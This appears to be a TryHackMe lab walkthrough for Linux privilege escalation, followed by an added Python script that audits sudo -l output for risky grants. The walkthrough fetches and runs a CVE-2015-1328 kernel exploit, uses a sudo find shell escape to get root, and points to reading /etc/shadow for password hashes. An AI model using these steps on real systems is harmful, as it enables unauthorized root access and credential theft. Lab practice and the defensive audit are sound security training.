Note: each part uses a different machine, so when you complete a task, stop the old machine and start a new one for the next task.
Link: https://tryhackme.com/room/linprivesc
$ uname -a
Linux wade7363 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
CVE-2015-1328 PoC: https://www.exploit-db.com/exploits/37292
On your own machine, serve the PoC over HTTP:
$ python3 -m http.server 8000
On the victim machine:
$ cd /tmp
$ wget http://10.4.126.108/poc.c
$ gcc poc.c -o poc
$ id
uid=1001(karen) gid=1001(karen) groups=1001(karen)
$ ./poc
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(karen)
# cat /home/matt/flag1.txt
???
As always, use sudo -l to check which binaries can be run with sudo:
$ sudo -l
Matching Defaults entries for karen on ip-10-10-54-112:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User karen may run the following commands on ip-10-10-54-112:
    (ALL) NOPASSWD: /usr/bin/find
    (ALL) NOPASSWD: /usr/bin/less
    (ALL) NOPASSWD: /usr/bin/nano
In this solution I use find; you can use less or nano instead, as you prefer.
Go to https://gtfobins.github.io/gtfobins/find/#sudo and copy the sudo command:
$ sudo find . -exec /bin/sh \; -quit
# id
uid=0(root) gid=0(root) groups=0(root)
You are root now. flag2.txt is located at /home/ubuntu/flag2.txt.
To answer the question about nmap, look up nmap on GTFOBins again: https://gtfobins.github.io/gtfobins/nmap/#sudo
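The sudo -l output above is exactly what a sudoers audit should catch before such a rule reaches a host. As an added example that is not part of the original walkthrough, this Python script parses that output (embedded here as a constructed sample) and flags an unrestricted ALL grant or any rule for a binary this page points at on GTFOBins (find, less, nano, nmap), noting when NOPASSWD removes the password check as well.

```python
import re

# Constructed sample input: the `sudo -l` output shown on this page, embedded so the
# script runs offline (on a real host, feed it the output of `sudo -l` instead).
SUDO_L_OUTPUT = r"""
Matching Defaults entries for karen on ip-10-10-54-112:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User karen may run the following commands on ip-10-10-54-112:
    (ALL) NOPASSWD: /usr/bin/find
    (ALL) NOPASSWD: /usr/bin/less
    (ALL) NOPASSWD: /usr/bin/nano
"""

# Binaries this page points at on GTFOBins: each can spawn a shell or write arbitrary
# files when run under sudo, so a sudo rule for them is equivalent to granting root.
SHELL_ESCAPE_BINARIES = {"find", "less", "nano", "nmap"}

# One privilege line of `sudo -l`: "(runas) [TAG: ...] command[, command ...]"
PRIV_LINE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+?)\s*$")

def parse_sudo_l(text):
    """Return (runas, tags, command) triples from the 'may run' section of `sudo -l`."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_cmds = True  # everything before this header is Defaults output
            continue
        m = PRIV_LINE.match(line) if in_cmds else None
        if m:
            tags = {t.rstrip(":") for t in m.group("tags").split()}
            # several commands may share one line, comma-separated (commas inside args not handled)
            for cmd in m.group("cmds").split(", "):
                entries.append((m.group("runas").strip(), tags, cmd))
    return entries

def risky_entries(text):
    """Flag grants that amount to root: ALL, or a binary with a known sudo shell escape."""
    findings = []
    for _runas, tags, cmd in parse_sudo_l(text):
        binary = cmd.split()[0].rsplit("/", 1)[-1]  # basename of the permitted program
        if cmd == "ALL":
            findings.append((cmd, "unrestricted command set"))
        elif binary in SHELL_ESCAPE_BINARIES:
            why = "known sudo shell escape (GTFOBins)"
            if "NOPASSWD" in tags:
                why += ", no password required"
            findings.append((cmd, why))  # on this page's sample: find, less, nano
    return findings
```

Any finding means the rule should be replaced with a narrowly scoped command, or the grant removed, rather than relying on the password prompt.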
You can also read /etc/shadow to find the password hashes of all user accounts.